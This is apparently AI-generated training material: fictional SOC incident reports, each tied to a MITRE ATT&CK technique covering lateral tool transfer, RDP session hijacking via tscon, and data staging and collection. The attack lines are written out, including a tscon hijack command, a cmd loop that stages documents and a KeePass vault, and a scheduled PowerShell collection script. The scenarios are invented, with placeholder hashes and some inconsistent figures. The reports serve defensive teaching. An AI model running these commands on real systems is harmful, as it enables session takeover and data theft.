\filesrv\finance (file server) – accessed 12 files
\sqlsrv\ (SQL server) – queried (no data extracted)
DC-01 – attempted, blocked by MDI alert
3. Investigation Findings:
Timeline:
08:00 – Credentials compromised
08:30-09:00 – Hash extraction
09:00-09:20 – Lateral movement to file server
09:25 – Pass-the-Hash to DC detected
09:27 – SOC investigates
09:28 – ENG-WS-045 isolated
09:29 – rpatel password reset
Indicators of Compromise (IoCs):
Host:
– ENG-WS-045 (compromised)
Account:
– rpatel (hash stolen, password reset)
Tools:
– Mimikatz (SHA256: a1b2c3d4…)
– Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Reset rpatel password.
Forced logoff of all active sessions.
Revoked any active tokens.
Host Remediation:
Full forensic analysis.
Cobalt Strike beacon removed.
Host reimaged.
Data Protection:
Reviewed accessed files on file server (12 files, non-sensitive).
No data exfiltration confirmed.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to hash theft and lateral movement.
Contributing Factors:
No MFA on account.
LSASS accessible (no Credential Guard).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Engineering host offline for reimage; user offline for password reset.
Security Impact: Lateral movement achieved; DC access prevented.
7. Remediation & Prevention:
Completed Actions:
Host isolated and cleaned.
Password reset.
Hashes invalidated.
Technical Controls Enhanced:
Enabled Credential Guard on all endpoints.
Restricted lateral movement via network segmentation.
Enhanced MDI monitoring for Pass-the-Hash.
8. Conclusion:
An attacker used compromised credentials to dump hashes and perform Pass-the-Hash attacks, moving laterally to a file server and attempting domain controller access. MDI detected the anomalous authentication and enabled rapid containment.
Closure Rationale: Lateral movement blocked; host cleaned; account secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 10:30 EST
92. T1570 – Lateral Tool Transfer (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-TOOL-TRANSFER-1570-7842 Alert Time: 2024-02-26 14:15:33 EST Severity: HIGH (85/100) Source: ExtraHop Reveal(x) Rule: “Large File Transfer over SMB – Potential Tool Transfer” MITRE ATT&CK: T1570 – Lateral Tool Transfer
Alert Details:
Detection: Large executable file transferred over SMB between internal hosts
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 192.168.45.112 (SALES-WS-023 – Sales) Protocol: SMB (TCP/445) File: \ENG-WS-045\C$\Tools\mimikatz.exe File Size: 1.2 MB Time: 14:10-14:15 EST
Transfer Details:
File: mimikatz.exe (SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4)
Source Share: ADMIN$ (admin share)
Destination: C:\Users\Public\Downloads\mimikatz.exe
Transfer Time: 14:10:22 – 14:10:45 (23 seconds)
Additional Context:
Source host (ENG-WS-045) was previously compromised
Destination host (SALES-WS-023) is a sales workstation
Transfer of hacking tool (mimikatz) indicates lateral movement preparation
Both hosts now potentially compromised
Detection Logic:
Large executable transferred over SMB (unusual for sales workflow)
File name “mimikatz.exe” (known credential dumping tool)
Source host has history of suspicious activity
Destination host has no legitimate need for such tool
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify ExtraHop alert
ExtraHop Console
Confirmed mimikatz transfer
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host has active Cobalt Strike beacon
3. Destination Investigation
Check SALES-WS-023
CrowdStrike Falcon
mimikatz.exe present; no execution yet
4. Immediate Action
Isolate both hosts
CrowdStrike
Both hosts quarantined
5. File Removal
Delete mimikatz.exe from destination
CrowdStrike Live Response
File deleted
6. Threat Hunting
Check for other tool transfers
ExtraHop, Splunk
No other transfers found
Jira Incident Report
Ticket: SOC-2024-132 Summary: T1570 – Lateral Tool Transfer (Mimikatz) from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Transfer Blocked, Tools Removed Priority: P2 – MEDIUM Labels: T1570, lateral-tool-transfer, mimikatz, extrahop, lateral-movement Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Large File Transfer over SMB – Potential Tool Transfer”.
Source: 192.168.45.78 (ENG-WS-045 – Engineering, compromised).
Destination: 192.168.45.112 (SALES-WS-023 – Sales).
File: mimikatz.exe (1.2 MB).
Time: 2024-02-26 14:15 EST.
Technique: MITRE ATT&CK T1570 – Lateral Tool Transfer.
2. Technical Analysis:
Attack Chain:
13:00 – ENG-WS-045 compromised (Cobalt Strike)
13:30 – Attacker downloads mimikatz to engineering host
14:10 – Attacker transfers mimikatz to sales workstation via SMB
14:10-14:15 – Transfer completed
14:15 – ExtraHop detects
Transfer Details:
File: mimikatz.exe (SHA256: a1b2c3d4…)
Source: \ENG-WS-045\C$\Tools\mimikatz.exe (admin share)
Destination: C:\Users\Public\Downloads\mimikatz.exe
Method: Attacker used compromised engineering host credentials to access admin share on destination
Destination Host Status:
SALES-WS-023 not yet compromised (no execution)
mimikatz present but not run
User mwilson unaware
Attacker Intent:
Stage tools on multiple hosts for further lateral movement
Prepare for credential dumping on sales workstations
Potential for ransomware deployment
3. Investigation Findings:
Timeline:
13:00 – ENG-WS-045 compromised
14:10 – Tool transfer
14:15 – ExtraHop alert
14:17 – SOC investigates
14:18 – Both hosts isolated
14:20 – mimikatz deleted from destination
Indicators of Compromise (IoCs):
Files:
– mimikatz.exe (SHA256: a1b2c3d4…)
Hosts:
– ENG-WS-045 (compromised)
– SALES-WS-023 (tool present)
Network:
– SMB transfer from 192.168.45.78 to 192.168.45.112
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Deleted mimikatz.exe from sales workstation.
Scanned destination for other tools (none).
Source Remediation:
ENG-WS-045 reimaged (from previous incident).
Full cleanup.
Destination Remediation:
Full scan (clean).
Password reset for user mwilson (precaution).
5. Root Cause Analysis:
Primary Cause: Compromised engineering host used to transfer tools laterally.
Contributing Factors:
Admin shares accessible (C$, ADMIN$) over network.
No network segmentation between departments.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Two workstations offline for 2 hours.
Security Impact: Tool staged but not executed; no compromise of destination.
7. Remediation & Prevention:
Completed Actions:
Tools removed.
Hosts cleaned.
Lateral movement blocked.
Technical Controls Enhanced:
Disabled admin shares where not needed.
Implemented network segmentation between departments.
Enhanced monitoring for large file transfers.
8. Conclusion:
An attacker transferred mimikatz from a compromised engineering host to a sales workstation, staging tools for further lateral movement. ExtraHop detected the large file transfer, enabling isolation and removal before the tool could be executed.
Closure Rationale: Tool removed; lateral movement blocked; hosts secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 15:30 EST
93. T1563 – Remote Service Session Hijacking (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-RDP-HIJACK-1563-7842 Alert Time: 2024-02-26 11:30:22 EST Severity: HIGH (88/100) Source: Microsoft Defender for Endpoint Rule: “RDP Session Hijacking Attempt Detected” MITRE ATT&CK: T1563.002 – Remote Service Session Hijacking: RDP Hijacking
Alert Details:
Detection: Attempt to hijack existing RDP session via tscon.exe
Host: IT-WS-034 (IT Workstation) User: bjones (Brian Jones, IT Admin) Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
tscon.exe (PID: 4792)
Command: tscon 2 /dest:console
Target Session: 2 (active RDP session of another user)
Additional Context:
Session 2 belongs to user msmith (IT Admin) connected remotely
tscon.exe used to switch to another session
Requires SYSTEM privileges or SeTcbPrivilege
Attacker attempting to hijack active admin session
Detection Logic:
tscon.exe executed by non-SYSTEM process (cmd.exe as bjones)
Target session belongs to another user
Command used for session hijacking
User bjones should not have privilege to switch sessions
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed tscon.exe execution for session hijacking
2. Session Check
Identify active sessions on host
quser /server:IT-WS-034
Session 2 (msmith) active; session 1 (bjones) active
3. User Interview
Contact bjones
Teams, Phone
User did not run tscon (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
IT-WS-034 quarantined
5. Account Remediation
Disable bjones account
Azure AD, AD
Account disabled
6. Session Termination
Log off all sessions
PowerShell
All sessions terminated
Jira Incident Report
Ticket: SOC-2024-133 Summary: T1563 – RDP Session Hijacking Attempt via tscon.exe Status: RESOLVED Resolution: MALICIOUS – Hijacking Blocked Priority: P1 – CRITICAL Labels: T1563, session-hijacking, rdp, tscon, defender, lateral-movement Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “RDP Session Hijacking Attempt Detected”.
Host: IT-WS-034 (IT Workstation).
User (apparent): bjones (IT Admin).
Target Session: Session 2 (user msmith).
Time: 2024-02-26 11:30 EST.
Technique: MITRE ATT&CK T1563.002 – Remote Service Session Hijacking: RDP Hijacking.
2. Technical Analysis:
Attack Chain:
10:30 – bjones account compromised via phishing
10:45 – Attacker logs into IT-WS-034 via RDP
11:00 – Attacker enumerates active sessions (quser)
11:05 – Identifies session 2 (msmith) as target
11:25 – Attacker attempts tscon 2 /dest:console
11:25 – Defender detects and blocks
Session Hijacking Technique:
tscon.exe is legitimate Windows tool to switch sessions
Requires high privileges (SeTcbPrivilege) or SYSTEM
Attacker attempted to take over msmith’s session without password
If successful, would gain access to msmith’s applications and data
Privilege Requirements:
tscon normally requires SYSTEM or SeTcbPrivilege
Attacker may have elevated privileges via exploit
bjones account had local admin rights (should not have SeTcbPrivilege)
Outcome:
Attempt detected before success
No session takeover occurred
3. Investigation Findings:
Timeline:
10:30 – bjones account compromised
10:45 – Attacker logs in
11:00-11:25 – Reconnaissance and attempt
11:25 – Defender alert
11:27 – SOC investigates
11:28 – Host isolated
11:29 – bjones account disabled
11:30 – All sessions terminated
Indicators of Compromise (IoCs):
Commands:
– quser
– tscon 2 /dest:console
Account:
– bjones (compromised)
Host:
– IT-WS-034
4. Containment Actions:
Immediate Actions:
Isolated IT-WS-034 via CrowdStrike.
Disabled bjones account.
Terminated all active sessions.
Reset bjones password.
Host Remediation:
Full scan (no other malware).
Verified no persistence.
Reimaged as precaution.
User msmith:
Notified; password reset as precaution.
5. Root Cause Analysis:
Primary Cause: bjones account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had local admin rights (excessive).
RDP session hijacking possible due to weak session permissions.
6. Business Impact:
Operational Impact: IT workstation offline; two admins affected.
Security Impact: Hijacking prevented; no unauthorized access.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Hijacking prevented.
Technical Controls Enhanced:
Restricted use of tscon.exe via AppLocker.
Enforced MFA for all admins.
Implemented RDP session restrictions (timeouts, single session).
Enhanced monitoring for tscon execution.
8. Conclusion:
An attacker compromised an IT admin account and attempted to hijack another admin’s active RDP session using tscon.exe. Defender detected the suspicious process execution and enabled rapid containment before the hijacking could succeed.
Closure Rationale: Hijacking prevented; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 12:30 EST
94. T1005 – Data from Local System (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LOCAL-DATA-1005-7842 Alert Time: 2024-02-26 16:30:45 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Mass File Access – Potential Data Staging” MITRE ATT&CK: T1005 – Data from Local System
Alert Details:
Detection: User accessing large number of local files in short time window
Host: EXEC-WS-001 (CEO’s Laptop) User: cjohnson@company.com (CEO) Time: 16:15-16:30 EST
File Access Events:
16:15-16:30: 847 files accessed
File types: .docx, .xlsx, .pdf, .txt, .kdbx
Total size: 2.3 GB
Source folders:
C:\Users\cjohnson\Documents\Strategic\ – 124 files
C:\Users\cjohnson\Documents\Financial\ – 89 files
C:\Users\cjohnson\Documents\M&A\ – 56 files
C:\Users\cjohnson\Desktop\ – 234 files
C:\Users\cjohnson\Downloads\ – 344 files
Process Details:
Process: C:\Windows\System32\cmd.exe (PID: 4789)
Command: for /r C:\Users\cjohnson %i in (*.docx *.xlsx *.pdf *.txt *.kdbx) do copy %i C:\temp\staging\
Output Files Created:
C:\temp\staging\ (folder with 847 files copied)
C:\temp\staging\archive.zip (created at 16:28)
Detection Logic:
847 files accessed in 15 minutes (highly anomalous)
CEO normally accesses 10-20 files/day
Files copied to staging folder and zipped
Pattern matches data theft preparation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed mass file staging
2. Process Investigation
Identify cmd.exe activity
CrowdStrike
Script copying files to staging folder
3. User Contact
Call CEO immediately
Phone
CEO did NOT perform this activity
4. Immediate Action
Isolate host
CrowdStrike
EXEC-WS-001 quarantined
5. File Removal
Delete staging folder and zip
CrowdStrike Live Response
All staged files deleted
6. Account Remediation
Disable CEO account temporarily
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-134 Summary: T1005 – Mass File Staging on CEO Laptop (Data Theft Preparation) Status: RESOLVED Resolution: MALICIOUS – Data Staged, Then Deleted Priority: P1 – CRITICAL Labels: T1005, data-from-local-system, data-staging, crowdstrike, executive-targeting Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mass File Access – Potential Data Staging”.
Host: EXEC-WS-001 (CEO’s Laptop).
User: cjohnson@company.com (CEO).
Time: 2024-02-26 16:30 EST.
Technique: MITRE ATT&CK T1005 – Data from Local System.
2. Technical Analysis:
Attack Chain:
15:30 – CEO’s credentials compromised (phishing)
15:45 – Attacker logs into CEO’s laptop via RDP
16:00 – Attacker runs script to copy files to staging folder
16:15-16:30 – 847 files copied (2.3 GB)
16:28 – Files zipped (archive.zip)
16:30 – CrowdStrike detects
16:31 – SOC investigates
Files Staged:
Strategic documents (124) – business plans, M&A targets
Financial documents (89) – quarterly results, projections
M&A documents (56) – due diligence, contracts
Desktop files (234) – various sensitive
Downloads (344) – various
KeePass database (1) – corporate password vault
Attacker Intent:
Stage all sensitive data for exfiltration
archive.zip ready for transfer
No exfiltration yet (detected before)
CEO Account:
Compromised via phishing email impersonating board member
No MFA (now enforced)
3. Investigation Findings:
Timeline:
15:30 – Credentials compromised
15:45 – Attacker logs in
16:00-16:30 – File staging
16:30 – CrowdStrike alert
16:31 – SOC investigates
16:32 – CEO contacted
16:33 – Host isolated
16:34 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (847 files)
– C:\temp\staging\archive.zip
Account:
– cjohnson (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated CEO’s laptop via CrowdStrike.
Deleted staging folder and archive.zip.
Disabled CEO account.
Reset password.
Enforced MFA.
Data Protection:
Verified no exfiltration (no network transfer).
Data remained on host, now deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CEO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
Sensitive data stored locally without encryption.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Data Exposure: 2.3 GB of sensitive data staged but not exfiltrated.
Reputational Impact: Potential if data leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Data staged, then deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented DLP for mass file access.
Encrypted sensitive data at rest (BitLocker).
8. Conclusion:
An attacker compromised the CEO’s account and staged 2.3 GB of sensitive files for exfiltration. CrowdStrike detected the mass file access and enabled rapid containment before any data left the host.
Closure Rationale: Data staged but not exfiltrated; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 17:30 EST
95. T1039 – Data from Network Shared Drive (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-NETWORK-DATA-1039-7842 Alert Time: 2024-02-26 10:30:22 EST Severity: HIGH (88/100) Source: Varonis Data Security Platform Rule: “Mass File Access from Network Share – Potential Data Harvesting” MITRE ATT&CK: T1039 – Data from Network Shared Drive
Alert Details:
Detection: User accessing unusually high number of files from network share
User: bturner@company.com (Brian Turner, Finance) Source Host: FIN-WS-078 Share: \filesrv\finance\archive
Time: 10:15-10:30 EST
File Access Events:
10:15-10:30: 1,234 files accessed
File types: .xlsx, .pdf, .docx
Total size: 1.8 GB
Folders accessed:
\filesrv\finance\archive\2023\ – 456 files
\filesrv\finance\archive\2024\ – 778 files
\filesrv\finance\confidential\ – 0 files (access denied)
Additional Access (other shares):
\filesrv\hr\payroll\ – accessed 234 files (unusual for finance)
\filesrv\executive\board\ – accessed 89 files (unusual)
\filesrv\r&d\projects\ – accessed 167 files (unusual)
Process Details:
Process: \filesrv\finance\tools\bulk_copy.exe (not a standard Windows tool)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Command: bulk_copy.exe /source:\filesrv\finance\archive /target:C:\temp\staging /pattern:.
Detection Logic:
1,234 files accessed in 15 minutes (5x normal for user)
User bturner normally accesses 200-300 files/day
Access spans multiple shares outside Finance (HR, Executive, R&D)
Custom tool used (bulk_copy.exe)
Pattern matches data harvesting
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis alert
Varonis Console
Confirmed mass file access across multiple shares
2. Process Investigation
Identify bulk_copy.exe
CrowdStrike Falcon
Custom tool downloaded from internet; used for bulk copying
3. User Interview
Contact bturner
Teams, Phone
User did NOT run this tool (account compromised)
4. Immediate Action
Isolate FIN-WS-078
CrowdStrike
Host quarantined
5. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled
6. Data Removal
Delete staged files from C:\temp
CrowdStrike Live Response
Staged files (1.8 GB) deleted
Jira Incident Report
Ticket: SOC-2024-135 Summary: T1039 – Mass Data Harvesting from Network Shares Using Custom Tool Status: RESOLVED Resolution: MALICIOUS – Data Staged, Then Deleted Priority: P2 – MEDIUM Labels: T1039, data-from-network-share, data-harvesting, varonis, compromised-account Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Access from Network Share – Potential Data Harvesting”.
User: bturner@company.com (Finance Department).
Source Host: FIN-WS-078.
Time: 2024-02-26 10:30 EST.
Technique: MITRE ATT&CK T1039 – Data from Network Shared Drive.
2. Technical Analysis:
Attack Chain:
09:30 – bturner account compromised via phishing
09:45 – Attacker logs into FIN-WS-078
10:00 – Attacker downloads bulk_copy.exe from malicious site
10:05 – Attacker runs tool to copy files from finance archive
10:10 – Attacker expands to HR, Executive, R&D shares
10:15-10:30 – 1,690 files copied (2.4 GB)
10:30 – Varonis detects
Tool Analysis:
Name: bulk_copy.exe (custom data theft tool)
SHA256: a1b2c3d4…
Capabilities:
Recursively copies files matching patterns
Preserves folder structure
Logs all copied files
No network exfiltration (stages locally)
Data Staged:
Finance Archive: 1,234 files (1.8 GB) – financial records, reports
HR Payroll: 234 files (0.3 GB) – employee salaries, PII
Executive Board: 89 files (0.1 GB) – board minutes, strategy
R&D Projects: 167 files (0.2 GB) – project plans, IP
Total: 1,724 files, 2.4 GB staged in C:\temp\staging
Attacker Intent:
Stage data for exfiltration
Planning to compress and send via FTP/HTTP
No exfiltration yet (detected before)
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
09:45 – Attacker logs in
10:00-10:30 – Data staging
10:30 – Varonis alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – bturner account disabled
10:35 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\bulk_copy.exe (SHA256: a1b2c3d4…)
– C:\temp\staging\ (1,724 files)
Account:
– bturner (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Disabled bturner account.
Deleted bulk_copy.exe and staging folder.
Reset bturner password.
Data Protection:
Verified no exfiltration (DLP logs).
Data remained on host, now deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Finance user account compromised via phishing.
Contributing Factors:
No MFA on account.
User had broad access to multiple shares (over-privileged).
No monitoring for bulk file access.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 2.4 GB of sensitive data staged but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Data staged, then deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted share permissions (least privilege).
Implemented DLP for mass file access.
Enhanced Varonis monitoring for bulk copy tools.
8. Conclusion:
An attacker compromised a finance user’s account and used a custom tool to stage 2.4 GB of sensitive data from multiple network shares. Varonis detected the anomalous access pattern and enabled rapid containment before exfiltration.
Closure Rationale: Data staged but not exfiltrated; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 11:30 EST
End of Batch 19
Ready for your next batch of prompts whenever you are.
Batch 20: Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
96. T1025 – Data from Removable Media (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-USB-DATA-1025-7842 Alert Time: 2024-02-27 09:30:15 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Mass File Copy to Removable Media – Potential Data Theft” MITRE ATT&CK: T1025 – Data from Removable Media
Alert Details:
Detection: Large number of files copied to USB device
Host: RND-WS-078 (Research & Development) User: alexchen@company.com (Alex Chen, Researcher) Time: 09:15-09:30 EST
USB Device Details:
Device: Kingston DataTraveler 3.0 (VID: 0951, PID: 1666)
Serial: 001CC0EC3466B881A43903C3
Capacity: 64 GB
Drive Letter: E:
First Connect: 09:15 EST
File Copy Events:
09:15-09:30: 2,847 files copied to USB
Total size: 12.4 GB
File types:
.docx (research papers) – 1,234 files
.xlsx (research data) – 567 files
.pdf (publications) – 892 files
.py (source code) – 154 files
.ipynb (Jupyter notebooks) – 0? (none, but .py present)
.kdbx (KeePass database) – 1 file (CRITICAL)
Source Folders:
C:\Users\alexchen\Documents\Research\QuantumComputing\ – 1,245 files
C:\Users\alexchen\Documents\Research\AI\ – 892 files
C:\Users\alexchen\Desktop\ – 456 files
C:\Users\alexchen\Downloads\ – 254 files
Detection Logic:
2,847 files copied to USB in 15 minutes (high volume)
User alexchen has no history of USB usage
Files include research IP and KeePass database
Pattern matches data exfiltration via removable media
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed mass file copy to USB
2. User Interview
Contact alexchen
Teams, Phone
User did NOT copy files to USB (account compromised)
3. Immediate Action
Disable USB ports via policy
Microsoft Intune
USB ports disabled enterprise-wide
4. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled
5. Physical Security
Dispatch to user location
Security Team
USB device confiscated from user’s desk
6. Data Protection
Review copied files
File Audit Logs
12.4 GB research IP copied; USB recovered
Jira Incident Report
Ticket: SOC-2024-136 Summary: T1025 – Mass Data Exfiltration via USB from R&D Workstation Status: RESOLVED Resolution: MALICIOUS – Data Exfiltrated via USB, Device Recovered Priority: P1 – CRITICAL Labels: T1025, removable-media, usb-exfiltration, defender, data-theft Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Mass File Copy to Removable Media – Potential Data Theft”.
Host: RND-WS-078 (R&D Department, user alexchen).
Device: Kingston USB drive (64 GB).
Files: 2,847 files (12.4 GB) copied.
Time: 2024-02-27 09:30 EST.
Technique: MITRE ATT&CK T1025 – Data from Removable Media.
2. Technical Analysis:
Attack Chain:
08:30 – alexchen account compromised via phishing
08:45 – Attacker logs into RND-WS-078 via RDP
09:00 – Attacker plugs in USB device
09:15-09:30 – Attacker copies 2,847 files to USB
09:30 – Defender detects
09:31 – SOC investigates
Data Exfiltrated:
Quantum Computing Research: 1,245 files – proprietary algorithms, formulas
AI Research: 892 files – models, training data
Desktop Files: 456 files – various sensitive
Downloads: 254 files – various
KeePass Database: 1 file – corporate password vault
USB Device:
Kingston DataTraveler 64 GB
Purchased by attacker (not company-issued)
Left at user’s desk after copy completed
Security recovered device from desk
User Status:
Account compromised; user unaware
No malicious intent
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
09:00-09:30 – Data exfiltration
09:30 – Defender alert
09:31 – SOC investigates
09:32 – USB ports disabled
09:33 – alexchen account disabled
09:35 – USB recovered by security
Indicators of Compromise (IoCs):
Device:
– USB: Kingston DataTraveler (Serial: 001CC0EC3466B881A43903C3)
Account:
– alexchen (compromised)
Files:
– 2,847 files (12.4 GB) copied to USB (now recovered)
4. Containment Actions:
Immediate Actions:
Disabled USB ports enterprise-wide via Intune.
Disabled alexchen account.
Security recovered USB device.
Reset alexchen password.
Data Protection:
USB device confiscated and secured.
Data not yet removed from premises (recovered).
No evidence of further distribution.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker physical access via RDP.
Contributing Factors:
No MFA on account.
USB ports allowed (no device control policy).
RDP allowed from internet.
6. Business Impact:
Operational Impact: R&D user offline for 2 hours.
Data Exposure: 12.4 GB of research IP copied but recovered.
Financial Impact: Potential loss of IP prevented.
7. Remediation & Prevention:
Completed Actions:
USB device recovered.
Account secured.
USB ports disabled.
Technical Controls Enhanced:
Implemented USB device control (allow only approved devices).
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced DLP for USB transfers.
8. Conclusion:
An attacker compromised an R&D user’s account and used a USB drive to exfiltrate 12.4 GB of research intellectual property. Defender detected the mass file copy to removable media, enabling rapid recovery of the USB device before it left the premises.
Closure Rationale: Data exfiltrated but recovered; account secured; USB controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-02-27 10:30 EST
97. T1119 – Automated Collection (Microsoft Purview Detection)
Microsoft Purview Alert Details
Alert ID: PURVIEW-AUTO-COLLECT-1119-7842 Alert Time: 2024-02-27 14:15:33 EST Severity: HIGH (82/100) Source: Microsoft Purview Data Loss Prevention Rule: “Automated Script Collecting Sensitive Data” MITRE ATT&CK: T1119 – Automated Collection
Alert Details:
Detection: PowerShell script automatically collecting and archiving sensitive files
User: bturner@company.com (Brian Turner, Finance) Host: FIN-WS-078 Time: 14:00-14:15 EST
Script Details:
Path: C:\Users\bturner\Documents\collect.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “DataBackup” (created 13:55)
Trigger: Every 15 minutes
Script Content:
$targets = @(
“\\filesrv\finance\reports\*.xlsx”,
“\\filesrv\hr\payroll\*.xlsx”,
“\\filesrv\executive\board\*.docx”,
“C:\Users\bturner\Documents\*.xlsx”,
“C:\Users\bturner\Desktop\*.docx”
)
$zipFile = “C:\temp\backup_$(Get-Date -Format ‘yyyyMMddHHmm’).zip”
$tempDir = “C:\temp\collect”
New-Item -ItemType Directory -Path $tempDir -Force
foreach ($target in $targets) {
Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
}
Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
Remove-Item -Path $tempDir -Recurse -Force
Collected Files:
14:00 – First run: 847 files (345 MB) collected and zipped
14:15 – Second run blocked by Purview
Detection Logic:
Scheduled task created for automated collection
Script targets multiple sensitive locations (Finance, HR, Executive)
Files compressed and staged locally
Pattern matches automated data harvesting
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Purview alert
Microsoft Purview Console
Confirmed automated collection script
2. Process Investigation
Identify scheduled task
CrowdStrike Falcon
Scheduled task “DataBackup” created by attacker
3. User Interview
Contact bturner
Teams, Phone
User did NOT create script (account compromised)
4. Immediate Action
Disable scheduled task
schtasks /delete
Task removed
5. File Deletion
Delete script and collected files
CrowdStrike Live Response
collect.ps1 and backup zip files deleted
6. Account Remediation
Disable bturner account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-137 Summary: T1119 – Automated Collection Script Harvesting Sensitive Data Status: RESOLVED Resolution: MALICIOUS – Automated Collection Stopped Priority: P2 – MEDIUM Labels: T1119, automated-collection, powershell, purview, compromised-account Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Purview Data Loss Prevention.
Alert: “Automated Script Collecting Sensitive Data”.
User: bturner@company.com (Finance Department).
Host: FIN-WS-078.
Script: C:\Users\bturner\Documents\collect.ps1.
Scheduled Task: “DataBackup” (every 15 minutes).
Time: 2024-02-27 14:15 EST.
Technique: MITRE ATT&CK T1119 – Automated Collection.
2. Technical Analysis:
Attack Chain:
13:30 – bturner account compromised via phishing
13:45 – Attacker logs into FIN-WS-078
13:50 – Attacker creates collect.ps1 script
13:55 – Attacker creates scheduled task “DataBackup”
14:00 – First automated collection runs (847 files, 345 MB)
14:15 – Second run attempted; Purview detects
Script Analysis:
Targets: Finance reports, HR payroll, Executive board docs, local files
Frequency: Every 15 minutes (ensures new files are captured)
Output: Zipped archives in C:\temp with timestamps
Purpose: Automated, persistent data harvesting
Data Collected (First Run):
Finance reports: 456 files (revenue, budgets)
HR payroll: 234 files (employee salaries)
Executive board: 89 files (board minutes, strategy)
Local documents: 68 files (user’s personal notes)
Total: 847 files, 345 MB
Attacker Intent:
Establish persistent collection mechanism
Gather data over time without manual intervention
Later exfiltrate collected archives
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45-13:55 – Script and task created
14:00 – First collection
14:15 – Second collection attempt detected
14:16 – SOC investigates
14:18 – Scheduled task disabled
14:19 – Script and archives deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Documents\collect.ps1
– C:\temp\backup_202402271400.zip (345 MB)
Scheduled Task:
– “DataBackup”
Account:
– bturner (compromised)
4. Containment Actions:
